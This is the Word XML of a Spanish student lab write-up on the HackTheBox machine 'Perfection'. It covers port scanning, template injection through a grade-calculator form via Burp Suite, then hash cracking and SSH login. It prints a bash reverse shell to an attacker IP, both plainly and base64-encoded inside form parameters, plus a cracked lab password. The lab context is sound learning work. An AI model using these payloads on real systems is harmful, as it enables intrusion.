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57EF4" w14:textId="77777777" w:rsidR="005D7BF8" w:rsidRDefault="005D7BF8"/>
    <w:p w14:paraId="71167034" w14:textId="77777777" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D190AB" w14:textId="49A7EB27" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEDE2EA" w14:textId="12B645CA" w:rsidR="00494C9D" w:rsidRPr="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9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Juan Camilo Peña Marín</w:t>
      </w:r>
      <w:r w:rsidRPr="00494C9D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4A749B81" w14:textId="77777777" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D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</w:p>
    <w:p w14:paraId="70EACE8E" w14:textId="77777777" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D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</w:p>
    <w:p w14:paraId="40A92AFE" w14:textId="77777777" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D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</w:p>
    <w:p w14:paraId="1404B68F" w14:textId="5ACA1471" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9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94C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>PROFESOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033DACFD" w14:textId="358A3CA0" w:rsidR="00494C9D" w:rsidRPr="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D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 w:rsidRPr="00494C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">JOHAN SEBASTIAN GIRALDO HURTADO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C0C79" w14:textId="45975DF1" w:rsid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AFBB42D" w14:textId="053C0316" w:rsid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A4F0336" w14:textId="743B0C80" w:rsid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5B7B32" w14:textId="0891E7D6" w:rsid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077B8D5" w14:textId="6BFAB724" w:rsid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C50D246" w14:textId="139F7404" w:rsid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73273D9" w14:textId="15934718" w:rsid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E1B0F7A" w14:textId="77777777" w:rsidR="00494C9D" w:rsidRPr="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C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8B93A7F" w14:textId="77777777" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D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</w:p>
    <w:p w14:paraId="70FAE159" w14:textId="157F1E47" w:rsidR="00494C9D" w:rsidRPr="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9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94C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>INSTITUCION EDUCATIVA EAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3F9D5" w14:textId="0E5DEA5F" w:rsidR="00494C9D" w:rsidRPr="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9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13</w:t>
      </w:r>
      <w:r w:rsidRPr="00494C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00494C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>/2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F51AE6" w14:textId="5B15BA53" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B99FB02" w14:textId="0D3F7B68" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576E0C09" w14:textId="33D0AB82" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675065D4" w14:textId="125F5A6C" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1CA3FE" w14:textId="38CC4168" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF60F9F" w14:textId="10C1FC44" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF76456" w14:textId="39D13AD1" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ACA3C45" w14:textId="2B76DC77" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F479F4" w14:textId="02F74C61" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2CE8FE" w14:textId="18F31C16" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D"/>
    <w:p w14:paraId="41893A3B" w14:textId="77777777" w:rsidR="00494C9D" w:rsidRDefault="00494C9D" w:rsidP="00494C9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63483247" w14:textId="04DB8031" w:rsidR="005C2B54" w:rsidRDefault="00B537BD" w:rsidP="00B537BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Máquina: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D7BF8">
        <w:t>Perfection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB6292">
        <w:t xml:space="preserve"> y nos conectamos a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB6292">
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB6292">
        <w:t xml:space="preserve"> descargada del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB6292">
        <w:t>hackthebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EC14E0F" w14:textId="77777777" w:rsidR="00FB6292" w:rsidRDefault="00FB6292" w:rsidP="00FB6292">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D33B181" w14:textId="41441590" w:rsidR="00D2393F" w:rsidRDefault="00FB6292" w:rsidP="00FB6292">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="005D7BF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C24453A" wp14:editId="70381304">
            <wp:extent cx="5612130" cy="27514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4CCE" w14:textId="77777777" w:rsidR="00B537BD" w:rsidRDefault="00B537BD"/>
    <w:p w14:paraId="3DBF88E0" w14:textId="474DCB6F" w:rsidR="00B537BD" w:rsidRDefault="00B537BD" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Acá accedemos a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y vemos que tenemos acceso a la página web </w:t>
      </w:r>
      <w:r w:rsidR="00FB6292">
        <w:t xml:space="preserve">con la dirección </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB6292">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB6292">
        <w:t xml:space="preserve"> de la máquina 10.10.11.253</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457D746C" w14:textId="5FB6D7A6" w:rsidR="00B537BD" w:rsidRDefault="00FB6292">
      <w:r w:rsidRPr="00B537BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="047BE9D4" wp14:editId="23B113A4">
            <wp:extent cx="5612130" cy="26269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D1F" w14:textId="77777777" w:rsidR="00B537BD" w:rsidRDefault="00B537BD"/>
    <w:p w14:paraId="26A3AC18" w14:textId="66DC5496" w:rsidR="00B537BD" w:rsidRDefault="00070DAA" w:rsidP="00B537BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Escaneamos puertos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E41E75" w14:textId="25EAF650" w:rsidR="00070DAA" w:rsidRDefault="00070DAA" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F80FAA" w14:textId="10980757" w:rsidR="00D669C8" w:rsidRDefault="00D669C8" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00070DAA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="335E51E6" wp14:editId="75207687">
            <wp:extent cx="5612130" cy="2079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E225" w14:textId="77777777" w:rsidR="00A25088" w:rsidRDefault="00A25088" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCD4FF4" w14:textId="3A24FE63" w:rsidR="00A25088" w:rsidRDefault="00D669C8" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Observamos</w:t>
      </w:r>
      <w:r w:rsidR="00A25088">
        <w:t xml:space="preserve"> que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la página</w:t>
      </w:r>
      <w:r w:rsidR="00A25088">
        <w:t xml:space="preserve"> tiene el puerto 22 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A25088">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A25088">
        <w:t xml:space="preserve"> abierto y el puerto 80 http </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A25088">
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B9B871C" w14:textId="77777777" w:rsidR="00C32036" w:rsidRDefault="00C32036" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F19B36B" w14:textId="2C4DFD4C" w:rsidR="00C32036" w:rsidRDefault="00D669C8" w:rsidP="00C32036">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ensayamos y analizamos</w:t>
      </w:r>
      <w:r w:rsidR="0099725A">
        <w:t xml:space="preserve"> la página para </w:t>
      </w:r>
      <w:r>
        <w:t>ver como funciona y qué podemos hacer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CF7D4E" w14:textId="1A4370F7" w:rsidR="0099725A" w:rsidRDefault="00D669C8" w:rsidP="0099725A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="0099725A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2851822F" wp14:editId="2F586407">
            <wp:extent cx="5612130" cy="23958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5083" w14:textId="77777777" w:rsidR="00491DCF" w:rsidRDefault="00491DCF" w:rsidP="0099725A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE1E02F" w14:textId="77777777" w:rsidR="00491DCF" w:rsidRDefault="00491DCF" w:rsidP="0099725A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F67BDE8" w14:textId="2882C0F3" w:rsidR="00491DCF" w:rsidRDefault="00D669C8" w:rsidP="00491DCF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Consultamos en internet, y nos informan que debemos</w:t>
      </w:r>
      <w:r w:rsidR="00491DCF">
        <w:t xml:space="preserve"> manipular las solicitudes para poder entrar. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ya que la página o calculadora realiza validaciones y envía datos. </w:t>
      </w:r>
      <w:r w:rsidR="00491DCF">
        <w:t xml:space="preserve">Entonces </w:t>
      </w:r>
      <w:r>
        <w:t>se dice que usamos un software llamado</w:t>
      </w:r>
      <w:r w:rsidR="00491DCF">
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00491DCF">
        <w:t>urp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00491DCF">
        <w:t xml:space="preserve"> Suite para </w:t>
      </w:r>
      <w:r w:rsidR="001B5438">
        <w:t xml:space="preserve">inyectar líneas en las solicitudes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128745AD" w14:textId="4A6239DE" w:rsidR="00AC6E28" w:rsidRDefault="00D669C8" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00AC6E28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3552D390" wp14:editId="23C4FF9C">
            <wp:extent cx="5612130" cy="2770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DCA8" w14:textId="77777777" w:rsidR="00AC6E28" w:rsidRDefault="00AC6E28" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="1AC467B2" w14:textId="050C6D5C" w:rsidR="00AC6E28" w:rsidRDefault="00AC6E28" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Acá escaneábamos la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pagina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00310363">
        <w:t xml:space="preserve">y tratábamos de hacer un Shell </w:t>
      </w:r>
      <w:r w:rsidR="00D669C8">
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="00310363">
        <w:t xml:space="preserve"> cargando lo siguiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C63172" w14:textId="3B25DBF9" w:rsidR="00414323" w:rsidRDefault="00414323" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Sacamos el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00414323">
        <w:t>hURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00414323">
        <w:t>hURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00414323">
        <w:t xml:space="preserve"> -B "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00414323">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00414323">
        <w:t xml:space="preserve"> -i &gt;&amp; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00414323">
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00414323">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00414323">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00414323">
        <w:t>/10.10.14.</w:t>
      </w:r>
      <w:r>
        <w:t>126</w:t>
      </w:r>
      <w:r w:rsidRPr="00414323">
        <w:t>/7373 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3674BAA5" w14:textId="372927F4" w:rsidR="00414323" w:rsidRDefault="00414323" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="40EE9794" w14:textId="51CFDE21" w:rsidR="00414323" w:rsidRDefault="00D669C8" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="005158A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E897008" wp14:editId="6CED623D">
            <wp:extent cx="5612130" cy="24866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4F6A" w14:textId="48A9D8CE" w:rsidR="00414323" w:rsidRDefault="00414323" w:rsidP="00AC6E28">
      <w:r>
        <w:t>Y luego hacemos el Shell reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2832D00B" w14:textId="790AAAF3" w:rsidR="00414323" w:rsidRDefault="00414323" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00414323">
        <w:t>grade1=1&amp;weight1=100&amp;category2=N%2FA&amp;grade2=1&amp;weight2=0&amp;category3=N%2FA&amp;grade3=1&amp;weight3=0&amp;category4=N%2FA&amp;grade4=1&amp;weight4=0&amp;category5=N%2FA&amp;grade5=1&amp;weight5=0&amp;category1=a%0A&lt;%25%3dsystem("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4xMjYvNz</w:t>
      </w:r>
      <w:r w:rsidR="00D669C8">
        <w:t>%2BJjE%3D</w:t>
      </w:r>
      <w:r w:rsidRPr="00414323">
        <w:t>|+base64+-d+|+bash"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00414323">
        <w:t>);%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00414323">
        <w:t>25&gt;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C1180" w14:textId="6C148169" w:rsidR="00993072" w:rsidRDefault="00993072" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="5B752B5D" w14:textId="77777777" w:rsidR="005F619A" w:rsidRDefault="005F619A" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="52A47199" w14:textId="0A90C31A" w:rsidR="005F619A" w:rsidRDefault="005F619A" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="067FE7BD" w14:textId="6DB3A981" w:rsidR="005158A2" w:rsidRDefault="00BC2F3C" w:rsidP="00414323">
      <w:r>
        <w:t xml:space="preserve">Ponemos a escuchar en el puerto </w:t>
      </w:r>
      <w:r w:rsidR="00D85B72">
        <w:t xml:space="preserve">7373 ya que es un puerto orientado a la conexión </w:t>
      </w:r>
      <w:r>
        <w:t>y mandamos la Shell reverse</w:t>
      </w:r>
      <w:r w:rsidR="00D85B72">
        <w:t xml:space="preserve"> desde el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D85B72">
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D85B72">
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:t>para tener acceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7EF34F" w14:textId="0C5FCF01" w:rsidR="00BC2F3C" w:rsidRDefault="00BC2F3C" w:rsidP="00414323">
      <w:r w:rsidRPr="00BC2F3C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52950C3D" wp14:editId="7D879045">
            <wp:extent cx="5612130" cy="16383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DF7" w14:textId="77777777" w:rsidR="00310363" w:rsidRDefault="00310363" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="740B482A" w14:textId="1FDA3BEF" w:rsidR="001359F9" w:rsidRDefault="001359F9" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Ya al haber ingresado, leemos el archivo del usuario </w:t>
      </w:r>
      <w:r w:rsidR="00633752">
        <w:t>Susan</w:t>
      </w:r>
      <w:r w:rsidR="00BC2F3C">
        <w:t xml:space="preserve"> que es el user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A53A3F" w14:textId="70D616DF" w:rsidR="00633752" w:rsidRDefault="00633752" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00633752">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60386F5B" wp14:editId="6DE8A222">
            <wp:extent cx="5612130" cy="17011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383C" w14:textId="77777777" w:rsidR="00633752" w:rsidRDefault="00633752" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="6523C50E" w14:textId="5E61DA6C" w:rsidR="00633752" w:rsidRDefault="00633752" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Ahora hay que buscar el del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4797A172" w14:textId="1432F85C" w:rsidR="00633752" w:rsidRDefault="00581D82" w:rsidP="00581D82">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hay que desencriptar estos datos de Susan</w:t>
      </w:r>
      <w:r w:rsidR="0082038A">
        <w:t xml:space="preserve"> (hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE7B20E" w14:textId="41F8337F" w:rsidR="00581D82" w:rsidRDefault="00581D82" w:rsidP="00581D82">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00581D82">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69DC6680" wp14:editId="6D06D59F">
            <wp:extent cx="5612130" cy="6775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32F9" w14:textId="117B9DBB" w:rsidR="00633752" w:rsidRDefault="00752282" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Copiamos el hash en un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EAAC9A" w14:textId="420B95FB" w:rsidR="00752282" w:rsidRDefault="00752282" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00752282">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51859374" wp14:editId="6DFC8416">
            <wp:extent cx="5612130" cy="11963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2202" w14:textId="77777777" w:rsidR="002E72C6" w:rsidRDefault="002E72C6" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="49887160" w14:textId="42BCB13D" w:rsidR="00354835" w:rsidRDefault="002E72C6" w:rsidP="00AC6E28">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Nos arroja que la clave </w:t>
      </w:r>
      <w:r w:rsidR="00051C03">
        <w:t xml:space="preserve">del usuario Susan </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es: </w:t>
      </w:r>
      <w:r w:rsidR="00D300C6">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>usan_nasus_4137</w:t>
      </w:r>
      <w:r w:rsidR="003622F6">
        <w:t>59210</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526C74A" w14:textId="341FCEFC" w:rsidR="00354835" w:rsidRDefault="00354835" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00354835">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43546BD1" wp14:editId="18B91BB4">
            <wp:extent cx="5163271" cy="552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684D" w14:textId="77777777" w:rsidR="00B43F20" w:rsidRDefault="00B43F20" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="5903631B" w14:textId="1A7D3A95" w:rsidR="00B43F20" w:rsidRDefault="00051C03" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Ahora lo que debemos hacer es entrar por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> al usuario Susan, por lo que al final l</w:t>
      </w:r>
      <w:r w:rsidR="00B43F20">
        <w:t xml:space="preserve">ogramos ingresar con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B43F20">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="776DFD32" w14:textId="30A0AEAD" w:rsidR="00B43F20" w:rsidRDefault="00B43F20" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00B43F20">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F59FEC9" wp14:editId="150DF8B8">
            <wp:extent cx="5612130" cy="42392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C159" w14:textId="77777777" w:rsidR="009D758D" w:rsidRDefault="009D758D" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="603A9799" w14:textId="7E9E2CBF" w:rsidR="009D758D" w:rsidRDefault="009D758D" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="009D758D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15279ED0" wp14:editId="5F40E33F">
            <wp:extent cx="5612130" cy="25190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2906" w14:textId="77777777" w:rsidR="00DB763D" w:rsidRDefault="00DB763D" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="0DFA2112" w14:textId="39EF3C12" w:rsidR="00DB763D" w:rsidRDefault="002472BE" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00DB763D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29E05E86" wp14:editId="2FBCED8E">
            <wp:extent cx="5612130" cy="32581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C816" w14:textId="1E13CC09" w:rsidR="00051C03" w:rsidRDefault="00051C03" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="76A87CBC" w14:textId="77777777" w:rsidR="00051C03" w:rsidRDefault="00051C03" w:rsidP="00051C03">
      <w:r>
        <w:t xml:space="preserve">La clave del user.txt: </w:t>
